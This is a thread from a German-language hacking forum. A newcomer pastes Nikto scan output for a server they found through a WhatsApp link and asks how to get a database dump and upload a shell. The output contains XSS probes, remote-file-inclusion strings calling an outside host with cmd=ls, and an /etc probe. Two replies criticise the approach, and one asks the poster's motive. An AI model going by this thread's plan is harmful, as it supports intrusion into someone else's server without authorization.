Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

Nikto richtig auslesen,Whatsapp hat mich auf ACP geleitet

- - - - -

  • Bitte melde dich an um zu Antworten
2 Antworten in diesem Thema

#1
LearningbyDoing

LearningbyDoing

    Leecher

  • Members
  • PIP
  • Likes
    0
  • 1 Beiträge
  • 0 Bedankt

Hallo und vielen Dank das ich hier sein darf.

Ich bräuchte für den Anfang mal Hilfe von euch.

Habe Heute in Whatsapp geschrieben, dort hängte an meiner Nachricht ein Text der erst wie Werbung aussah.

Als ich ruafgeklickt habe wurde ich auf eine spanische Domain mit einem Froxlor ACP weiter geleitet.

Die Domain ist auf einen deutschen geregt hab ich schon rausbekommen, danach dachte ich mir nach quellcode untersuchung geh ich mal tiefer und habe nikto-master drüber laufen lassen.

 

Hier mal ein Auszug was der brachte, die Domain und IP nehme ich erstmal raus, per PN gebe ich gerne weitere Infos

C:\Perl\nikto-master\program>nikto.pl -h http://xxx/templates/misc
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          xxx.xxx.xxx.xxx
+ Target Hostname:    xxxxxxxxxxxxxxx
+ Target Port:        80
+ Start Time:         2015-11-27 19:05:49 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-3268: /templates/misc/: Directory indexing found.
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.16). Apache 2.2.31 is also current for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-3268: /templates/misc/./: Directory indexing found.
+ OSVDB-3268: /templates/misc/?mod=node&nid=some_thing&op=view: Directory indexing found.
+ OSVDB-3268: /templates/misc/?mod=some_thing&op=browse: Directory indexing found.
+ /templates/misc/./: Appending '/./' to a directory allows indexing
+ /templates/misc/servlet/webacc?User.html=noexist: Netware web access may reveal full path of the web server. Apply vendor patch or upgrade.
+ OSVDB-3268: /templates/misc//: Directory indexing found.
+ /templates/misc//: Apache on Red Hat Linux release 9 reveals the root directory listing by default if there is no index page.
+ OSVDB-3268: /templates/misc/?Open: Directory indexing found.
+ OSVDB-3268: /templates/misc/?OpenServer: Directory indexing found.
+ OSVDB-3268: /templates/misc/%2e/: Directory indexing found.
+ OSVDB-576: /templates/misc/%2e/: Weblogic allows source code or directory listing, upgrade to v6.0 SP1 or higher. http://www.securityfocus.com/bid/2513.
+ OSVDB-3268: /templates/misc/?mod=<script>alert(document.cookie)</script>&op=browse: Directory indexing found.
+ OSVDB-3268: /templates/misc/?sql_debug=1: Directory indexing found.
+ OSVDB-3268: /templates/misc///: Directory indexing found.
+ OSVDB-3268: /templates/misc/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: Directory indexing found.
+ OSVDB-3268: /templates/misc/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: Directory indexing found.
+ OSVDB-3268: /templates/misc/?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: Directory indexing found.
+ OSVDB-3268: /templates/misc/?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: Directory indexing found.
+ OSVDB-3268: /templates/misc/?PageServices: Directory indexing found.
+ OSVDB-119: /templates/misc/?PageServices: The remote server may allow directory listings through Web Publisher by forcing the server to show all files via 'open directory browsing'. Web Publisher should be disabled. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0269.
+ OSVDB-3268: /templates/misc/?wp-cs-dump: Directory indexing found.
+ OSVDB-119: /templates/misc/?wp-cs-dump: The remote server may allow directory listings through Web Publisher by forcing the server to show all files via 'open directory browsing'. Web Publisher should be disabled. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0269.
+ OSVDB-3268: /templates/misc///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////: Directory indexing found.
+ OSVDB-3288: /templates/misc///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////: Abyss 1.03 reveals directory listing when          /'s are requested.
+ OSVDB-3268: /templates/misc/?pattern=/etc/*&sort=name: Directory indexing found.
+ OSVDB-3268: /templates/misc/?D=A: Directory indexing found.
+ OSVDB-3268: /templates/misc/?N=D: Directory indexing found.
+ OSVDB-3268: /templates/misc/?S=A: Directory indexing found.
+ OSVDB-3268: /templates/misc/?M=A: Directory indexing found.
+ OSVDB-3268: /templates/misc/?\"><script>alert('Vulnerable');</script>: Directory indexing found.
+ OSVDB-3268: /templates/misc/?_CONFIG[files][functions_page]=http://cirt.net/rfiinc.txt?: Directory indexing found.
+ OSVDB-3268: /templates/misc/?npage=-1&content_dir=http://cirt.net/rfiinc.txt?%00&cmd=ls: Directory indexing found.
+ OSVDB-3268: /templates/misc/?npage=1&content_dir=http://cirt.net/rfiinc.txt?%00&cmd=ls: Directory indexing found.
+ OSVDB-3268: /templates/misc/?show=http://cirt.net/rfiinc.txt??: Directory indexing found.
+ OSVDB-3268: /templates/misc/?-s: Directory indexing found.
+ OSVDB-3268: /templates/misc/?q[]=x: Directory indexing found.
+ OSVDB-3268: /templates/misc/?sc_mode=edit: Directory indexing found.
+ OSVDB-3268: /templates/misc/?xmlcontrol=body%20onload=alert(123): Directory indexing found.
+ OSVDB-3268: /templates/misc/?admin: Directory indexing found.
+ 7553 requests: 0 error(s) and 45 item(s) reported on remote host
+ End Time:           2015-11-27 19:12:54 (GMT1) (425 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

^^^ ^^^

 

is ja schonmal gut das apache 2.2.2 drauf läuft, aber auch nginx läuft drauf und mehrere Distributionen laut Quellcode

 

Ein Auszug zeigt ja:  OSVDB-3268: /templates/misc/?\"><script>alert('Vulnerable');</script>: Directory indexing found.

Also dachte ich mir lasse ich mal havij drüber laufen, aber entweder ich stell mich zu blöde an, oder bin da auf dem falschen Weg!?

 

Kann mir jemand helfen wie ich jetzt am besten weiter mache?

Will ja schon gern wissen was oder wer das genau ist und wer weis, vielleicht können wir ja einen nutzen draus tragen.

 

Wenn jemand nicht Pub helfen mag, so gerne auch per PN, weil ich verstehe das des dünnes Eis ist.

 

Wenn wir nen Dump bekommen, ist das nächste ne Shell die rauf soll, wobei des vielleicht unnötig ist da wir hier ja über ein Server Management Panel Reden.

 

Danke euch und seid bitte nicht zu Gnadenlos mit mir, wie in meiner Bewerbung ich bin Jahrelang raus und brauch nen Stubser, den Rest mach ich dann so wie mein Nickname schon sagt.

 

 

Ich geh jetzt auch langsam schlafen und wünsche euch allen eine  gute n8 und hoffe wir kommen da Morgen mit Frischer Idee und guten tips weiter.

 

Beste Grüße



#2
IRET

IRET

    Lamer

  • Members
  • PIPPIPPIP
  • Likes
    74
  • 20 Beiträge
  • 8 Bedankt

Danke euch und seid bitte nicht zu Gnadenlos mit mir, wie in meiner Bewerbung ich bin Jahrelang raus und brauch nen Stubser, den Rest mach ich dann so wie mein Nickname schon sagt.


Wie kann jemand jemals "drinnen" gewesen sein und gleich so wenig wissen? Mir kommt es so vor als würdest du deinen Freunden erzählen du hattest schon mal Sex (warst drinnen) und redest dabei über eine Gummipuppe.

Also dachte ich mir lasse ich mal havij drüber laufen, aber entweder ich stell mich zu blöde an, oder bin da auf dem falschen Weg!?


Ersteres. Einen Pfad der auf eine XSS getestet wird, wo nur "Directory indexing found" steht in Havij zu schicken ist als würdest du einen Deutschen bei eBay Geld auf sein polnisches Konto über weisen, für ein iPhone um 300€.


© by irgendeiner Seite aus Google
  • Ch!ller, smc2014 und MDDD gefällt das

#3
MDDD

MDDD

    Hacktivist

  • Members
  • PIPPIPPIPPIPPIP
  • Likes
    9
  • 70 Beiträge
  • 11 Bedankt

Nikto find ich nun auch nicht gerade empfehlenswert, viel false positivs, gibt weitaus bessere.

Der Ansatz mit Havij bei XSS ist auch nicht korrekt, sofern es sich hierbei nicht um eine false positiv von Nikto handelt.

 

darf man fragen wieso du diesen server hacken willst ?


adde mich

mddd_@exploit.im + OTR

suchst du was ?




  Thema Forum Themenstarter Statistik Letzter Beitrag

Besucher die dieses Thema lesen:

Mitglieder: , Gäste: , unsichtbare Mitglieder:


This topic has been visited by 55 user(s)


    , , _)_, .:dodo:., Arthurarsch, Born2Hack, Bot4ng, bumg2, Bypass, c3fC, Caroline, Ch!ller, Chocofresh, Crowx88, daten, DR.zydz, easysurfer, elmicky, Emalik Xantier, Framerater, FullMetall, Goooofy, Hydra, IRET, Janjij, JohnR, LearningbyDoing, lNobodyl, lolorollo, Lut0x, MDDD, Nexus88, nong_dan, noxx, o0o, opfata, pdr0, peacem4ker, Revofire, SAR, Silent0wn3r, Slixer, smc2014, Smn, Smokyjoe, sniffer, Statine, Take1T, twixeis, umarex, will, x4r4x, Xenio, xVirtu, ZeroFreez
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.